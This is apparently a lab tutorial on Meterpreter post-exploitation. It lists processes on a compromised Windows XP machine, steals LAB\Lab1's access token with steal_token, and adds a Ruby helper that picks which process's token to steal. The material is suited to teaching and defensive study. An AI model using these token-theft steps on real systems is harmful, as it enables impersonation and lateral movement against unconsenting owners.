
Metasploit Meterpreter: Using ps and stealing Kerberos tokens

This follows on from a previous post in which a target machine was exploited and a Meterpreter session obtained. Details of the exploited machine:

Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Running ps lists the processes on the target together with the account each one runs under, which is what tells you whose tokens are available to steal:

meterpreter > ps

Process List
============

PID   PPID  Name                      Arch  Session     User                          Path
---   ----  ----                      ----  -------     ----                          ----
0     0     [System Process]                4294967295
4     0     System                    x86   0           NT AUTHORITY\SYSTEM
192   1032  snmp.exe                  x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\snmp.exe
468   1032  alg.exe                   x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
512   1032  vmnat.exe                 x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\vmnat.exe
536   1032  svchost.exe               x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
580   1032  svchost.exe               x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
588   1032  vmnetdhcp.exe             x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\vmnetdhcp.exe
680   1032  vmware-authd.exe          x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Player\vmware-authd.exe
696   1032  svchost.exe               x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
788   128   explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE
860   536   wscntfy.exe               x86   0           LAB\Lab1                      C:\WINDOWS\system32\wscntfy.exe
892   4     smss.exe                  x86   0           NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
964   892   csrss.exe                 x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
988   892   winlogon.exe              x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
1032  988   services.exe              x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
1044  988   lsass.exe                 x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
1216  1032  svchost.exe               x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
1272  1032  svchost.exe               x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1436  988   logon.scr                 x86   0           LAB\Lab1                      C:\WINDOWS\System32\logon.scr
1460  1032  sqlbrowser.exe            x86   0           NT AUTHORITY\SYSTEM           c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
1508  1032  vmware-usbarbitrator.exe  x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
1652  1032  spoolsv.exe               x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
1928  1032  inetinfo.exe              x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
1968  1032  sqlservr.exe              x86   0           NT AUTHORITY\SYSTEM           c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
2080  788   hqtray.exe                x86   0           LAB\Lab1                      C:\Program Files\VMware\VMware Player\hqtray.exe
2424  2396  ACpwO.exe                 x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\TEMP\ACpwO.exe
3376  1032  svchost.exe               x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe

Four processes belong to the interactive user LAB\Lab1: explorer.exe (788), wscntfy.exe (860), logon.scr (1436) and hqtray.exe (2080). Any of them carries a usable token for that account; I've decided to steal the access token from PID 1436, the screensaver logon.scr running as LAB\Lab1.

meterpreter > steal_token 1436
Stolen token with username: LAB\Lab1

Meterpreter is now impersonating LAB\Lab1. steal_token duplicates the access token of the chosen process and applies it to the session's thread, so file, registry and network access from this session is authorised as Lab1 rather than as the account the payload started under. What is stolen is a Windows access token; if LAB\Lab1 is a domain account with an interactive logon, that token also lets the session authenticate to other hosts as Lab1, which is what the "Kerberos token" in the title refers to. Two checks worth doing: getuid should now report Server username: LAB\Lab1, and rev2self discards the stolen token and returns the session to its original identity.
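As an added example (it is not from the original post and not Metasploit code), the Ruby script below parses a ps listing like the one above and picks a process to borrow a token from. It slices each row at the header's column offsets, because splitting on whitespace breaks on account names such as NT AUTHORITY\NETWORK SERVICE, on paths containing spaces and on the empty cells of the [System Process] row. It then ranks the target user's processes, preferring explorer.exe over a screensaver. The listing embedded in it is a constructed excerpt of the table above, and the ranking order is my own rule of thumb rather than anything Meterpreter enforces.

```ruby
#!/usr/bin/env ruby
# Added example for this post; not part of Metasploit or the original write-up.
# Parses the text of a Meterpreter `ps` listing and picks a process whose access
# token is worth stealing for a given account. SAMPLE_PS is a constructed excerpt
# of the listing shown on the page, re-aligned into columns.

SAMPLE_PS = <<~'PS'
PID   PPID  Name              Arch  Session     User                          Path
---   ----  ----              ----  -------     ----                          ----
0     0     [System Process]        4294967295
4     0     System            x86   0           NT AUTHORITY\SYSTEM
580   1032  svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
788   128   explorer.exe      x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE
860   536   wscntfy.exe       x86   0           LAB\Lab1                      C:\WINDOWS\system32\wscntfy.exe
1044  988   lsass.exe         x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
1436  988   logon.scr         x86   0           LAB\Lab1                      C:\WINDOWS\System32\logon.scr
2080  788   hqtray.exe        x86   0           LAB\Lab1                      C:\Program Files\VMware\VMware Player\hqtray.exe
2424  2396  ACpwO.exe         x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\TEMP\ACpwO.exe
PS

ProcEntry = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

# Slice each row at the column offsets taken from the header line. Splitting on
# whitespace would break on "NT AUTHORITY\NETWORK SERVICE", on paths with spaces,
# and on the blank Arch/User cells of the [System Process] row.
def parse_ps(text)
  lines = text.lines.map(&:chomp).reject { |l| l.strip.empty? }
  header_idx = lines.index { |l| l.match?(/\bPID\b.*\bPPID\b.*\bUser\b/) }
  raise ArgumentError, 'no ps header found' unless header_idx

  starts = []
  lines[header_idx].scan(/\S+/) { starts << Regexp.last_match.begin(0) }

  rows = lines[(header_idx + 1)..].reject { |l| l.match?(/\A\s*-+(\s+-+)*\s*\z/) }
  rows.map do |line|
    cells = starts.each_with_index.map do |start, i|
      stop = starts[i + 1]
      (stop ? line[start...stop] : line[start..]).to_s.strip
    end
    pid, ppid, name, arch, session, user, path = cells
    ProcEntry.new(Integer(pid, 10), Integer(ppid, 10), name, arch, session, user, path)
  end
end

# Processes owned by an account; Windows account names compare case-insensitively.
def processes_for(procs, user)
  procs.select { |p| p.user.casecmp?(user) }
end

# Every account that has at least one process we could borrow a token from.
def accounts_present(procs)
  procs.map(&:user).reject(&:empty?).uniq.sort
end

# Preference order for a token source (my rule of thumb, not a Meterpreter rule):
# the user's explorer.exe lives as long as the desktop session; any other .exe next;
# a screensaver (.scr) last, since it exits as soon as the user touches the keyboard.
TOKEN_SOURCE_PREFERENCE = [/\Aexplorer\.exe\z/i, /\.exe\z/i, /\.scr\z/i].freeze

def choose_token_source(procs, user)
  candidates = processes_for(procs, user)
  TOKEN_SOURCE_PREFERENCE.each do |pattern|
    hit = candidates.find { |p| p.name.match?(pattern) }
    return hit if hit
  end
  nil
end

if $PROGRAM_NAME == __FILE__
  procs = parse_ps(SAMPLE_PS)
  puts "Accounts with a process on the box: #{accounts_present(procs).join(' | ')}"
  target = choose_token_source(procs, 'LAB\Lab1')
  puts "meterpreter > steal_token #{target.pid}    # #{target.name}, running as #{target.user}"
end
```

Run with ruby and it prints the steal_token line to type at the Meterpreter prompt. Inside a Metasploit post module the same information comes from client.sys.process.get_processes, which returns one hash per process with 'pid', 'ppid', 'name', 'path', 'user', 'arch' and 'session' keys, and the theft itself is client.sys.config.steal_token(pid), with client.sys.config.getuid to confirm the new identity and client.sys.config.revert_to_self to undo it.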
